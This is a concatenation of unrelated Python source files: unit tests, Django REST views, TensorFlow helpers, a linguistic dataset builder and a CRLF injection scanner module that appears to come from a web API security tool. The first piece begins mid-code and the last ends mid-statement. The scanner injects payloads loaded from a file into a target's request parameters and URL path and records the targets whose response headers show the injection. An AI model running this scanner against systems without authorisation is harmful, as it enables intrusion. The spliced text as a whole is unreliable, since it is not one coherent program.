document in documents: tokens = []; for word in re.split(r'\s+', re.sub(r'[^a-z|\s]', '', document.lower())): tokens.append(word); print(Counter(tokens)); count_vector = CountVectorizer(token_pattern='(?u)\\b\\w\\w+\\b'); count_vector.fit(documents); print(count_vector.get_feature_names()); doc_array = count_vector.transform(documents).toarray(); print(doc_array); frequency_matrix = pd.DataFrame(data=doc_array, columns=count_vector.get_feature_names()); print(frequency_matrix);#!/usr/bin/python # coding: utf-8 import numpy as np import unittest from neural_aide.threesetsmetric import posregion class PosRegionTest(unittest.TestCase): def setUp(self): pass def test_pos_region_compile_error(self): points = np.array([ [0, 0], [0.1, 1], ]) with self.assertRaises(ValueError): posregion.PosRegion(points) def test_2D_pos_region_good_number_of_facets(self): points = np.array([ [0.2, 0.2], [0.1, 1], [1, 0.1], ]) test = posregion.PosRegion(points) self.assertEqual(3, len(test.facets)) def test_3D_pos_region_good_number_of_facets(self): points = np.array([ [0.2, 0.2, 0.2], [0.1, 1, 0.1], [1, 0.1, 0.3], [0.3, 0.3, 1] ]) test = posregion.PosRegion(points) self.assertEqual(4, len(test.facets)) def test_2D_pos_region_contain(self): points = np.array([ [0.2, 0.2], [0.1, 1], [1, 0.1], ]) test = posregion.PosRegion(points) ref = np.array([0.5, 0.5]) self.assertTrue(test.contain(ref)) def test_2D_pos_region_not_contain(self): points = np.array([ [0.2, 0.2], [0.1, 1], [1, 0.1], ]) test = posregion.PosRegion(points) ref = np.array([1, 1]) self.assertFalse(test.contain(ref)) def test_2D_pos_region_add_vertex(self): points = np.array([ [0.2, 0.2], [0.1, 1], [1, 0.1], ]) test = posregion.PosRegion(points) test.add_vertex(np.array([1.1, 1.1])) ref = np.array([1, 1]) self.assertTrue(test.contain(ref)) def test_2D_pos_region_add_vertex(self): points = np.array([ [0.2, 0.2], [0.1, 1], [1, 0.1], ]) test = posregion.PosRegion(points) test.add_vertex(np.array([-0.1, -0.1])) ref = np.array([0, 0]) self.assertTrue(test.contain(ref)) def test_2D_pos_region_clean_vertex(self): points = np.array([ [0.2, 0.2], [0.1, 1], [1, 0.1], ]) test = posregion.PosRegion(points) test.add_vertex(np.array([-0.1, -0.1])) self.assertEqual(test.vertices.shape[0], 3) if __name__ == "__main__": unittest.main() gatewaymanish/astra_python3 import requests import os from urllib.parse import urlparse import urllib.parse from utils.db import Database_update from . import sendrequest as req dbupdate = Database_update() def fetch_crlf_payload(): # This function fetch the payloads from text file. payload_list = [] if os.getcwd().split('/')[-1] == 'API': path = '../Payloads/crlf.txt' else: path = 'Payloads/crlf.txt' with open(path) as f: for line in f: if line: payload_list.append(line.rstrip()) return payload_list def crlf_post_method(uri,method,headers,body,scanid=None): # This function checks CRLF through POST method. temp_body = {} for key,value in list(body.items()): crlf_payloads = fetch_crlf_payload() for payload in crlf_payloads: temp_body.update(body) temp_body[key] = payload crlf_post_request = req.api_request(uri, "POST", headers, temp_body) for name in crlf_post_request.headers: if "CRLF-Test" in name: attack_result = { "id" : 13, "scanid" : scanid, "url" : uri, "alert": "CRLF injection", "impact": "High", "req_headers": headers, "req_body": temp_body, "res_headers": crlf_post_request.headers ,"res_body": crlf_post_request.text} dbupdate.insert_record(attack_result) print("[+]{0} is vulnerable to CRLF injection".format(uri)) return def crlf_get_uri_method(uri,method,headers,scanid=None): # This function checks CRLF through GET URI method. par_key = {} url_query = urllib.parse.urlparse(uri) parsed_query = urllib.parse.parse_qs(url_query.query) for key,value in list(parsed_query.items()): crlf_payloads = fetch_crlf_payload() for payload in crlf_payloads: par_key.update(parsed_query) par_key[key] = payload parsed_uri = urllib.parse.urlparse(uri).scheme+"://"+urllib.parse.urlparse(uri).netloc+urllib.parse.urlparse(uri).path+"?"+urllib.parse.urlparse(uri).query.replace(value[0], payload) crlf_get_method = req.api_request(parsed_uri, "GET", headers) for name in crlf_get_method.headers: if "CRLF-Test" in name: attack_result = { "id" : 13, "scanid" : scanid, "url" : parsed_uri, "alert": "CRLF injection", "impact": "High", "req_headers": headers, "req_body":"NA", "res_headers": crlf_get_method.headers ,"res_body": crlf_get_method.text} dbupdate.insert_record(attack_result) print("[+]{0} is vulnerable to CRLF injection".format(parsed_uri)) return def crlf_get_url_method(uri,headers,scanid=None): # This function checks CRLF through GET URL method. crlf_payloads = fetch_crlf_payload() for payload in crlf_payloads: parsed_uri = urllib.parse.urlparse(uri).scheme+"://"+urllib.parse.urlparse(uri).netloc+urllib.parse.urlparse(uri).path+"/"+payload crlf_get_method = req.api_request(parsed_uri, "GET", headers) for name in crlf_get_method.headers: if "CRLF-Test" in name: attack_result = { "id" : 13, "scanid" : scanid, "url" : parsed_uri, "alert": "CRLF injection", "impact": "High", "req_headers": headers, "req_body":"NA", "res_headers": crlf_get_method.headers ,"res_body": crlf_get_method.text} dbupdate.insert_record(attack_result) print("[+]{0} is vulnerable to CRLF injection".format(parsed_uri)) return def crlf_check(uri,method,headers,body,scanid): # Main function for CRLF attack if method == 'GET' or method == 'DEL': crlf_get_uri_method(uri,method,headers,scanid) crlf_get_url_method(uri,headers,scanid) if method == 'POST' or method == 'PUT': crlf_post_method(uri,method,headers,body,scanid) coll-gate/collgateserver/classification/classificationentrysynonym.py # -*- coding: utf-8; -*- # # @file classificationentrysynonym.py # @brief Views related to the classification entry synonym model. # @author (INRA UMR1095) # @date 2016-09-01 # @copyright Copyright (c) 2016 INRA/CIRAD # @license MIT (see LICENSE file) # @details from django.core.exceptions import SuspiciousOperation from django.db import IntegrityError from django.db import transaction from django.db.models import Q from django.shortcuts import get_object_or_404 from django.views.decorators.cache import cache_page from django.utils.translation import ugettext_lazy as _ from classification import localsettings from igdectk.rest.handler import * from igdectk.rest.response import HttpResponseRest from main.models import EntitySynonymType from .models import ClassificationEntrySynonym, ClassificationEntry from .base import RestClassification from .classificationentry import RestClassificationEntry, RestClassificationEntryId class RestClassificationEntrySynonym(RestClassificationEntry): regex = r'^synonym/$' suffix = 'synonym' class RestClassificationEntrySynonymSearch(RestClassificationEntrySynonym): regex = r'^search/$' suffix = 'search' class RestClassificationEntryIdSynonym(RestClassificationEntryId): regex = r'^synonym/$' suffix = 'synonym' class RestClassificationEntryIdSynonymId(RestClassificationEntryIdSynonym): regex = r'^(?P[0-9]+)/$' suffix = 'id' @RestClassificationEntrySynonymSearch.def_auth_request(Method.GET, Format.JSON, ('filters',)) def search_classification_entry_synonym(request): """ Quick search for a classification entry synonym with a exact or partial name. """ filters = json.loads(request.GET['filters']) results_per_page = int_arg(request.GET.get('more', 30)) cursor = request.GET.get('cursor') limit = results_per_page if cursor: cursor = json.loads(cursor) cursor_name, cursor_id = cursor qs = ClassificationEntrySynonym.objects.filter(Q(name__gt=cursor_name) | ( Q(name=cursor_name) & Q(id__gt=cursor_id))) else: qs = ClassificationEntrySynonym.objects.all() if 'name' in filters['fields']: name_method = filters.get('method', 'ieq') if name_method == 'ieq': qs = qs.filter(name__iexact=filters['name']) elif name_method == 'icontains': qs = qs.filter(name__icontains=filters['name']) if 'synonym_type' in filters['fields']: st_method = filters.get('synonym_type_method', 'eq') if st_method == 'eq': qs = qs.filter(synonym_type_id=filters['synonym_type']) # elif st_method == 'in': # qs = qs.filter(synonym_type_id__in=filters['synonym_type']) if 'language' in filters['fields']: method = filters.get('language_method', 'eq') if method == 'eq': qs = qs.filter(language=filters['language']) elif method == 'neq': qs = qs.exclude(language=filters['language']) qs = qs.order_by('name', 'id')[:limit] items_list = [] for synonym in qs: s = { 'id': synonym.id, 'value': synonym.id, 'label': synonym.name, 'synonym_type': synonym.synonym_type_id, 'classification_entry': synonym.entity_id } items_list.append(s) if len(items_list) > 0: # prev cursor (asc order) obj = items_list[0] prev_cursor = (obj['label'], obj['id']) # next cursor (asc order) obj = items_list[-1] next_cursor = (obj['label'], obj['id']) else: prev_cursor = None next_cursor = None results = { 'perms': [], 'items': items_list, 'prev': prev_cursor, 'cursor': cursor, 'next': next_cursor, } return HttpResponseRest(request, results) @RestClassificationEntryIdSynonym.def_auth_request( Method.POST, Format.JSON, content={ "type": "object", "properties": { "synonym_type": {"type:": "number"}, "language": ClassificationEntrySynonym.LANGUAGE_VALIDATOR, "name": ClassificationEntrySynonym.NAME_VALIDATOR }, }, perms={ 'classification.change_classificationentry': _("You are not allowed to modify a classification entry"), 'classification.add_classificationentrysynonym': _("You are not allowed to add a synonym to a classification entry"), } ) def classification_entry_add_synonym(request, cls_id): classification_entry = get_object_or_404(ClassificationEntry, id=int(cls_id)) # check that type is in the values of descriptor synonym_type = get_object_or_404(EntitySynonymType, id=int_arg(request.data['synonym_type'])) entity_synonym = ClassificationEntrySynonym.add_entity_synonym( classification_entry, synonym_type, request.data['name'], request.data['language']) result = { 'id': entity_synonym.pk, 'synonym_type': entity_synonym.synonym_type_id, 'name': entity_synonym.name, 'language': entity_synonym.language } return HttpResponseRest(request, result) @RestClassificationEntryIdSynonymId.def_auth_request( Method.PUT, Format.JSON, content={ "type": "object", "properties": { "name": ClassificationEntrySynonym.NAME_VALIDATOR }, }, perms={ 'classification.change_classificationentry': _("You are not allowed to modify a classification entry"), 'classification.change_classificationentrysynonym': _("You are not allowed to modify a synonym to a classification entry"), } ) def classification_entry_change_synonym(request, cls_id, syn_id): classification_entry = get_object_or_404(ClassificationEntry, id=int(cls_id)) classification_entry_synonym = classification_entry.synonyms.get(id=int(syn_id)) name = request.data['name'] # no changes if name == classification_entry_synonym.name: return HttpResponseRest(request, {}) ClassificationEntrySynonym.rename(classification_entry, classification_entry_synonym, name) result = { 'id': classification_entry_synonym.id, 'name:': name } return HttpResponseRest(request, result) @RestClassificationEntryIdSynonymId.def_auth_request( Method.DELETE, Format.JSON, perms={ 'classification.change_classificationentry': _("You are not allowed to modify a classification entry"), 'classification.delete_classificationentrysynonym': _("You are not allowed to delete a synonym from a classification entry"), } ) def classification_entry_remove_synonym(request, cls_id, syn_id): synonym = get_object_or_404(ClassificationEntrySynonym, Q(id=int(syn_id)), Q(entity=int(cls_id))) if synonym.synonym_type_id == localsettings.synonym_type_classification_entry_name: raise SuspiciousOperation(_("It is not possible to remove a primary synonym")) synonym.delete() return HttpResponseRest(request, {}) maartenJacobs/gadk from gadk import * class MyService(Workflow): def __init__(self) -> None: super().__init__("my_service", "my service workflow") paths = [ "src/service/*.py", "src/service.yml", ] self.on( pull_request=On(paths=paths), push=On(branches=["master"], paths=paths), ) self.jobs["test"] = Job( steps=[RunStep("make build"), RunStep("make lint"), RunStep("make test"),], ) # Copyright 2020 The TensorFlow Probability Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Tests for TFP-internal random samplers.""" from absl import flags from absl.testing import parameterized import numpy as np import tensorflow.compat.v2 as tf from tensorflow_probability.python.internal import samplers from tensorflow_probability.python.internal import test_util flags.DEFINE_enum('test_tfp_jax_prng', 'default', ['default', 'rbg'], 'Which PRNG implementation to test with.') FLAGS = flags.FLAGS JAX_MODE = False NUMPY_MODE = False @test_util.test_all_tf_execution_regimes class RandomTest(test_util.TestCase): def setUp(self): super().setUp() if JAX_MODE and FLAGS.test_tfp_jax_prng != 'default': from jax.config import config # pylint: disable=g-import-not-at-top config.update('jax_enable_custom_prng', True) config.update('jax_default_prng_impl', FLAGS.test_tfp_jax_prng) @test_util.substrate_disable_stateful_random_test def test_sanitize_int(self): seed1 = samplers.sanitize_seed(seed=123) seed2 = samplers.sanitize_seed(seed=123) if tf.executing_eagerly(): self.assertNotAllEqual(seed1, seed2) else: self.assertAllEqual(seed1, seed2) @test_util.substrate_disable_stateful_random_test def test_sanitize_then_split_equivalent_split_int(self): seed = test_util.test_seed() sanitized = samplers.sanitize_seed(seed, salt='please pass the') s1 = samplers.split_seed(sanitized, n=3) if tf.executing_eagerly(): tf.random.set_seed(seed) s2 = samplers.split_seed(seed, n=3, salt='please pass the') self.assertAllAssertsNested(self.assertAllEqual, s1, s2) @test_util.substrate_disable_stateful_random_test def test_sanitize_none(self): seed1 = samplers.sanitize_seed(seed=None) seed2 = samplers.sanitize_seed(seed=None) self.assertNotAllEqual(seed1, seed2) def test_sanitize_tensor_or_tensorlike(self): seed = test_util.test_seed(sampler_type='stateless') seed1 = samplers.sanitize_seed(seed=self.evaluate(seed)) seed2 = samplers.sanitize_seed(seed) seed1, seed2 = self.evaluate([seed1, seed2]) self.assertSeedsEqual(seed1, seed2) seed3 = samplers.sanitize_seed([0, 1]) seed4 = samplers.sanitize_seed(np.array([0, 1])) seed3, seed4 = self.evaluate([seed3, seed4]) self.assertSeedsEqual(seed3, seed4) def test_split(self): seed = test_util.test_seed(sampler_type='stateless') seed1, seed2 = samplers.split_seed(seed) seed3, seed4 = samplers.split_seed(seed) seed, seed1, seed2, seed3, seed4 = self.evaluate( [seed, seed1, seed2, seed3, seed4]) self.assertSeedsNotEqual(seed, seed1) self.assertSeedsNotEqual(seed, seed2) self.assertSeedsNotEqual(seed1, seed2) self.assertSeedsEqual(seed1, seed3) self.assertSeedsEqual(seed2, seed4) def test_salted_split(self): seed = test_util.test_seed(sampler_type='stateless') seed1, seed2 = samplers.split_seed(seed, salt='normal') seed3, seed4 = samplers.split_seed(seed, salt='lognormal') seed, seed1, seed2, seed3, seed4 = self.evaluate( [seed, seed1, seed2, seed3, seed4]) self.assertSeedsNotEqual(seed, seed1) self.assertSeedsNotEqual(seed, seed2) self.assertSeedsNotEqual(seed1, seed2) self.assertSeedsNotEqual(seed1, seed3) self.assertSeedsNotEqual(seed2, seed4) self.assertSeedsNotEqual(seed3, seed4) @parameterized.named_parameters( dict(testcase_name='_categorical', sampler=samplers.categorical, kwargs=dict(logits=[[1, 1.05, 1]], num_samples=5)), dict(testcase_name='_gamma', sampler=samplers.gamma, kwargs=dict(shape=[2, 3], alpha=[.5, 1, 2.2], beta=0.75)), dict(testcase_name='_normal', sampler=samplers.normal, kwargs=dict(shape=[2])), dict(testcase_name='_poisson', sampler=samplers.poisson, kwargs=dict(shape=[2, 3], lam=[1.5, 5.5, 8.5])), dict(testcase_name='_poisson_scalar', sampler=samplers.poisson, kwargs=dict(shape=[], lam=[1.5, 5.5, 8.5])), dict(testcase_name='_shuffle', sampler=samplers.shuffle, kwargs=dict(value=list(range(10)))), dict(testcase_name='_uniform', sampler=samplers.uniform, kwargs=dict(shape=[2]))) def test_sampler(self, sampler, kwargs): if FLAGS.test_tfp_jax_prng == 'rbg' and sampler == samplers.gamma: self.skipTest('gamma sampler not implemented for rbg PRNG.') seed = test_util.test_seed(sampler_type='stateless') s1 = sampler(seed=seed, **kwargs) s2 = sampler(seed=seed, **kwargs) self.assertAllEqual(s1, s2) # We don't test these scenarios for numpy, jax, where we don't support # stateful sampling. if not JAX_MODE and not NUMPY_MODE: self.verify_tf_behavior_match(sampler, kwargs) def verify_tf_behavior_match(self, sampler, kwargs): s1 = sampler(seed=123, **kwargs) s2 = sampler(seed=123, **kwargs) tf_sampler = getattr(tf.random, sampler.__name__) tf_s1 = tf_sampler(seed=123, **kwargs) tf_s2 = tf_sampler(seed=123, **kwargs) if tf.executing_eagerly(): self.assertNotAllEqual(s1, s2) self.assertNotAllEqual(tf_s1, tf_s2) else: self.assertAllEqual(s1, s2) self.assertAllEqual(tf_s1, tf_s2) if __name__ == '__main__': test_util.main() import re import pathlib import collections from pybtex import database from clld.lib.bibtex import unescape from clldutils.text import split_text, split_text_with_context from csvw.dsv import reader from cldfbench import Dataset as BaseDataset, CLDFSpec from pycldf.sources import Source GB_LANGUAGE_MAP = { #GB - UT # Central Mansi [cent2322] #Komi-Permyak [komi1269] # Ume Saami [umes1235] 'gras1239': 'east2328', 'kama1378': 'kama1351', 'voro1241': 'sout2679', 'west2392': 'kozy1238', } def read(p, **kw): return list(reader(p, dicts=True, **kw)) def gb_codes(s): s = s.replace('multistate', '').strip() for code in split_text(s, separators=',;'): n, label = code.strip().split(':') assert isinstance(int(n), int), s yield n.strip(), label.strip() def fix_internal_stress(s): import unicodedata def is_letter(c): return c and unicodedata.category(c)[0] == 'L' new, last = [], None for i, c in enumerate(s): next = s[i + 1] if i + 1 < len(s) else None if c == "'" and is_letter(next) and is_letter(last): c = '\u02c8' new.append(c) last = c return ''.join(new) def check_example(p, d): ex = d['Example'].strip() if ex and ex.lower() not in ['example', 'examples']: ut_id = int(d["ID"].split('UT')[1]) # ignore all the examples of phonological features in UT if 116 <= ut_id <= 166: # parse multiple phonological (onw-word) examples of the following types: """ Lule_Saami.csv:UT154:misformatted IGT: "vuossja [vuoʃʃa] boil.CNG vs. vuossa [vuossa] bag.GEN.SG" Lule_Saami.csv:UT155:misformatted IGT: "biebbmo [pieb:muo] 'food', soabbe [soab:bie] 'walking stick'" """ refp = re.compile("\((?P[^)]+)\)") transp = re.compile("['’‘](?P[^'’]+)['’]") ex2 = fix_internal_stress(ex.replace("['", "[\u02c8")) phonemicp = re.compile(r"\s+/(?P[^/]+)/\s+") parsed = [] for e in split_text_with_context( ex2.replace("vs.", ",").replace('→', ',').replace(' : ', ' , ').replace('\n', ',').replace(' > ', ' , '), separators=",;", brackets={"'": "'", "’": "’", "[": "]", "‘": "’"}): word, morphemes, trans, gloss, phonemic, ref_or_comment = '', '', '', '', '', '' m = refp.search(e) if m: ref_or_comment = m.group('ref') e = refp.sub('', e).strip() if '/' in e and ('[' not in e): e = phonemicp.sub(lambda m: " [{}] ".format(m.group('ipa')), e) m = phonemicp.search(e) if m: phonemic = m.group('ipa') e = phonemicp.sub('', e).strip() tokens = collections.Counter(list(e)) if tokens['['] == 1 and tokens[']'] == 1: # IPA morphemes word_morphemes, rem = e.split(']') word, morphemes = word_morphemes.split('[') rem = rem.strip() m = transp.search(rem) if m: trans = m.group('trans') gloss = transp.sub('', rem).strip() else: gloss = rem #print("{} - {} - {} - {}".format(word.strip(), morphemes.strip(), gloss, trans)) else: if e.endswith('.'): e = e[:-1].strip() m = transp.search(e) if m and m.end() == len(e): # We got a translation e = transp.sub('', e).strip() trans = m.group('trans') comps = e.split() if len(comps) == 1: word = morpheme = comps[0] elif len(comps) == 2 and re.search(r'[A-Z]+', comps[1]): # two words and the second contains uppercase letters. Assume the # second to be the gloss. word = morphemes = comps[0] gloss = comps[1] else: print('----- {} -- {}'.format(e, ex)) parsed = [] break # FIXME: add phonemic transcription! parsed.append(( word.strip(), morphemes, gloss, trans, '({})'.format(ref_or_comment) if ref_or_comment else '')) for pp in parsed: yield pp if not parsed: yield (ex, '', '', '', '') else: done = False try: if '|' in ex and ';' in ex: try: parsed = [] for e in ex.split('|'): pt, g, t, c = e.split(';') if '[' in pt: pt, _, an = pt.partition('[') pt = pt.strip() an = an.replace(']', '').strip() else: an = pt if g: assert len(an.strip().split()) == len(g.strip().split()) parsed.append((pt, an.strip().split(), g.strip().split() if g else [], t, c)) done = True for pp in parsed: yield pp except: #raise pass if not done: # analyzed, gloss, translation = ex.split( # '\n' if '\n' in ex else ';')[:3] analyzed, gloss, translation = re.split(r'\n|;', ex)[:3] ipa = None if '[' in analyzed: analyzed, _, ipa = analyzed.partition('[') analyzed = analyzed.strip() ipa = ipa.replace(']', '').strip() analyzed, ipa = ipa, analyzed a = analyzed.strip().split() g = gloss.strip().split() if len(a) != len(g): if g: print('{}:{}:morphemes/gloss mismatch: "{}" - "{}"'.format(p.name, d['ID'], ' '.join(a), ' '.join(g))) # print(a) # print(g) # print('---') raise ValueError() yield (ipa or ' '.join(analyzed), analyzed, gloss, translation, '') except: print('{}:{}:misformatted IGT: "{}"'.format( p.name, d['ID'], ex.replace('\n', r'\n'))) #raise yield (ex, '', '', '', '') NA = ['?', '0?', '1?', '?1', '!!', '?CHECK, possibly 0', '?CHECK, possibly 1', '?CHECK'] class Dataset(BaseDataset): dir = pathlib.Path(__file__).parent id = "uratyp" def cldf_specs(self): # A dataset must declare all CLDF sets it creates. return CLDFSpec(dir=self.cldf_dir, module="StructureDataset") def cmd_download(self, args): pass def cmd_makecldf(self, args): data = collections.defaultdict(dict) bibdata = database.parse_file(str(self.raw_dir.joinpath('sources.bib'))) refs = collections.defaultdict(list) for key, entry in bibdata.entries.items(): src = Source.from_entry(key, entry) for k in src: src[k] = unescape(src[k]) for lid in src.get('langref', '').split(','): lid = lid.strip() refs[lid].append(src.id) args.writer.cldf.sources.add(src) examples = collections.defaultdict(list) for p in self.raw_dir.joinpath('UT', 'language-tables').glob('*.csv'): #if p.stem not in ['Finnish', 'Kazym_Khanty', 'Komi_Zyrian', 'Lule_Saami']: # continue for row in reader(p, dicts=True): # # FIXME: check examples right here! # data[p.stem][row['ID']] = row for ex in check_example(p, row): examples[p.stem, row['ID']].append(ex) args.writer.cldf.add_component( 'LanguageTable', { 'name': 'Source', 'separator': ';', "propertyUrl": "http://cldf.clld.org/v1.0/terms.rdf#source", }) args.writer.cldf.add_component('CodeTable') args.writer.cldf.add_component( 'ExampleTable', { 'name': 'Analyzed_Word_IPA', 'separator': '\t', } ) t = args.writer.cldf.add_component('ContributionTable') t.common_props['dc:description'] = \ "UraTyp combines typological data collected with two separate questionnaires. " \ "These questionnaires are listed in the ContributionTable, and parameters, " \ "i.e. features (and thus values) are linked to this table according to their origin." args.writer.cldf.add_component( 'ParameterTable', 'Area', { "name": "Contribution_ID", "propertyUrl": "http://cldf.clld.org/v1.0/terms.rdf#contributionReference", "dc:description": "Links a feature to the questionnaire it comes from.", }, ) args.writer.cldf['LanguageTable', 'Glottocode'].null = ['?'] args.writer.cldf['LanguageTable', 'ISO639P3code'].null = ['?'] # args.writer.cldf['LanguageTable', 'Macroarea'].null = ['Eurasia'] args.writer.cldf.add_columns('LanguageTable', 'Subfamily') args.writer.cldf.add_columns( 'ValueTable', {'name': 'Example_ID', 'propertyUrl': 'http://cldf.clld.org/v1.0/terms.rdf#exampleReference'}) lmap = {} for lang in self.raw_dir.read_csv('Languages.csv', dicts=True): lang['ISO639P3code'] = lang.pop('ISO.639.3') lang['Source'] = refs.get(lang['Name'], []) del lang['citations'] args.writer.objects['LanguageTable'].append(lang) lmap[lang['Name']] = lang['ID'] lmap[lang['Glottocode']] = lang['ID'] gb_features = { r['Feature_ID']: list(gb_codes(r['Possible Values'])) for r in self.raw_dir.read_csv('gb.csv', dicts=True)} eid = 0 for sd, contrib in [('UT', 'Uralic Areal Typology'), ('GB', 'Grambank')]: args.writer.objects['ContributionTable'].append( dict(ID=sd, Name=contrib)) for param in read(self.raw_dir / sd / 'Features.csv'): param['Contribution_ID'] = sd args.writer.objects['ParameterTable'].append(param) if sd == 'UT': codes = [('1', 'yes'), ('0', 'no')] else: codes = gb_features[param['ID']] for code, name in codes: args.writer.objects['CodeTable'].append(dict( ID='{}-{}'.format(param['ID'], code), Name=code, Description=name, Parameter_ID=param['ID'], )) for row in read(self.raw_dir / sd / 'Finaldata.csv'): for k in row: if k in ['language', 'subfam']: continue # if ('?' in row[k]) or ('!!' in row[k]): # continue d = {} lid = lmap[row['language']] if k.startswith('UT'): d = data[row['language']][k] if row[k] in ['', 'N/A']: # don't even include the rows continue assert list(d.values())[2] == row[k] #assert row[k] != '1' or d['Example'], str(d) for ex in examples[row['language'], k]: pt, analyzed, gloss, translation, comment = ex if (not pt) and analyzed: pt = ''.join(analyzed) if isinstance(analyzed, list) else analyzed if not pt: print(ex) continue eid += 1 args.writer.objects['ExampleTable'].append(dict( ID=str(eid), Language_ID=lid, Primary_Text=pt, Analyzed_Word=analyzed if isinstance(analyzed, list) else [analyzed], Gloss=[gloss] if isinstance(gloss, str) else gloss, Translated_Text=translation.strip(), )) args.writer.objects['ValueTable'].append(dict( ID='{}-{}'.format(lid, k), Language_ID=lid, Parameter_ID=k, Value='?' if row[k] in NA else str(int(float(row[k]))), Code_ID=None if row[k] in NA else '{}-{}'.format( k, int(float(row[k]))), Comment=d.get('Comment'), Example_ID=str(eid) if d.get('Example') else None, )) tests/test_trace_segment_client.py # -*- coding:utf-8 -*- # author:huawei import time from python2sky import config from python2sky.context.context_carrier import ContextCarrier from python2sky.context.context_manager import ContextManager from python2sky.remote.service_register_client import get_service_register from python2sky.remote.trace_segment_client import get_trace_segment_client from python2sky.util.uuid_util import global_id_to_string from tests.base_test_case import BaseTestCase class Trace_segment_client(BaseTestCase): def test_send(self): # get_service_register() # time.sleep(10) get_trace_segment_client() # time.sleep(0) # carrier = ContextCarrier() # carrier.deserialize(self.SW6) config.SERVICE_ID = 3 config.SERVICE_INSTANCE_ID = 53 entry_span = ContextManager.create_entry_span("/operation", None) # local_span = ContextManager.create_local_span("/local") # carrier2 = ContextCarrier() # exit_span = ContextManager.create_inject_exit_span("/exit", "192.168.3.11:8080", carrier2) # sw6 = carrier.serialize() # self.assertEqual(sw6, carrier.serialize()) # self.assertEqual(ContextManager.get_global_trace_id(), global_id_to_string(["3", "4", "5"])) # ContextManager.stop_span(exit_span) # ContextManager.stop_span(local_span) ContextManager.stop_span(entry_span) a276me/irisUI/app.py import sys from PyQt5.QtWidgets import QApplication, QMainWindow class MainWin(QMainWindow): def __init__(self): super(MainWin, self).__init__() self.ui = ui.Ui_MainWindow() self.ui.setupUi(self) app = QApplication(sys.argv) #设图标 mainWin = MainWin() #ui = untitled.Ui_MainWindow() #ui.setupUi(mainWin) mainWin.show() sys.exit(app.exec_())from __future__ import print_function import numpy as np import os import tensorflow as tf from tensorflow.contrib import rnn import tensorflow.contrib as tf_contrib import json import pprint import utils import base_model def variable_summaries(var): """Attach a lot of summaries to a Tensor (for TensorBoard visualization).""" with tf.name_scope('summaries'): mean = tf.reduce_mean(var) tf.summary.scalar('mean', mean) with tf.name_scope('stddev'): stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean))) tf.summary.scalar('stddev', stddev) tf.summary.scalar('max', tf.reduce_max(var)) tf.summary.scalar('min', tf.reduce_min(var)) tf.summary.histogram('histogram', var) def neurons_histogram(var, name): tf.summary.histogram(name=name, values=var) def neurons_scalar(var, name): tf.summary.scalar(name=name, tensor=var) tf.summary.histogram(name=name, values=var) def get_activation(inputs, act, name=None, **kwargs): if act == 'relu': return tf.nn.relu(inputs, name=name) elif act == 'tanh': return tf.nn.tanh(inputs, name=name) elif act == 'softmax': return tf.nn.softmax(inputs, name=name) else: return inputs def conv_layer(training, inputs, input_shape, filters, kernel_size, conv_num=1, use_bias=False, activation='relu', pooling=None, batch_norm=True, padding='valid', dropout=0.0, stride=1, name=None): assert len(input_shape) == 4 def compute_output_length(input_length, filter_size, padding, stride, dilation=1): if input_length is None: return None assert padding in {'same', 'valid', 'full', 'causal'} dilated_filter_size = filter_size + (filter_size - 1) * (dilation - 1) if padding == 'same': output_length = input_length elif padding == 'valid': output_length = input_length - dilated_filter_size + 1 elif padding == 'causal': output_length = input_length elif padding == 'full': output_length = input_length + dilated_filter_size - 1 return (output_length + stride - 1) // stride feed_input = inputs shape = list(input_shape) for i in range(conv_num): feed_input = tf.layers.conv2d(feed_input, filters=filters, kernel_size=[kernel_size] * 2, strides=[stride] * 2, padding=padding, use_bias=use_bias, data_format='channels_last', kernel_initializer=tf.contrib.layers.xavier_initializer(), name='{}_conv_{}'.format(name, i) ) if batch_norm: # conv = BatchNormalization()(conv) # model.add(BatchNormalization()) feed_input = tf.layers.batch_normalization(feed_input, training=training, name='{}_bn_{}'.format(name, i)) feed_input = get_activation(feed_input, activation, name='{}_act_{}'.format(name, i)) neurons_histogram(feed_input, '{}_convbnact_{}'.format(name, i)) shape[1:-1] = [compute_output_length(input_length=shape[1], filter_size=kernel_size, padding=padding, stride=stride, )] * 2 shape[-1] = filters return feed_input, shape def dense_layer(training, inputs, input_shape, units, activation=None, use_bias=True, kernel_initializer=tf_contrib.layers.xavier_initializer(), trainable=True, name=None, batch_norm=True, reuse=None, ): print('Dense layer: {}'.format(units)) inputs = tf.layers.dense(inputs, units=units, use_bias=use_bias, trainable=trainable, kernel_initializer=kernel_initializer, reuse=reuse, name='{}_dense'.format(name)) if batch_norm: inputs = tf.layers.batch_normalization(inputs, training=training, name='{}_bn'.format(name)) inputs = get_activation(inputs, activation, name='{}_act'.format(name)) neurons_histogram(inputs, '{}_densebnact'.format(name)) assert input_shape and len(input_shape) >= 2 assert input_shape[-1] output_shape = list(input_shape) output_shape[-1] = units return inputs, output_shape def cnn_block(training, inputs, input_shape, activation='relu', pooling=None, use_bias=False, batch_norm=True, padding='valid', print_fn=print, ): conv_configs = [ {'filters': 16, 'conv_num': 2, 'kernel_size': 4, 'stride': 1}, {'filters': 16, 'conv_num': 2, 'kernel_size': 4, 'stride': 2}, {'filters': 16, 'conv_num': 2, 'kernel_size': 4, 'stride': 1}, ] dense_units = 32 for i, config in enumerate(conv_configs): inputs, input_shape = conv_layer(training=training, inputs=inputs, input_shape=input_shape, filters=config['filters'], conv_num=config['conv_num'], kernel_size=config['kernel_size'], stride=config['stride'], use_bias=use_bias, padding=config.get('padding', padding), pooling=pooling, batch_norm=batch_norm, activation=activation, name='conv_{}'.format(i) ) print('conv {}, {}, {}'.format(i, config, input_shape)) # flatten input_shape = [input_shape[0], np.prod(input_shape[1:])] print('_flatten {}'.format(input_shape)) inputs = tf.reshape(inputs, input_shape) # dense inputs, input_shape = dense_layer(training, inputs, input_shape, dense_units, 'relu', use_bias, batch_norm=batch_norm, name='conv_fc') return inputs, input_shape def time_distributed(training, inputs, input_shape, applier, applier_config): shape = list(input_shape) time_length = shape[1] inside_shape = list([-1, ] + shape[2:]) print('inside_shape {}'.format(inside_shape)) inputs = tf.reshape(inputs, inside_shape) inputs, output_shape = applier(training=training, inputs=inputs, input_shape=inside_shape, **applier_config) inputs = 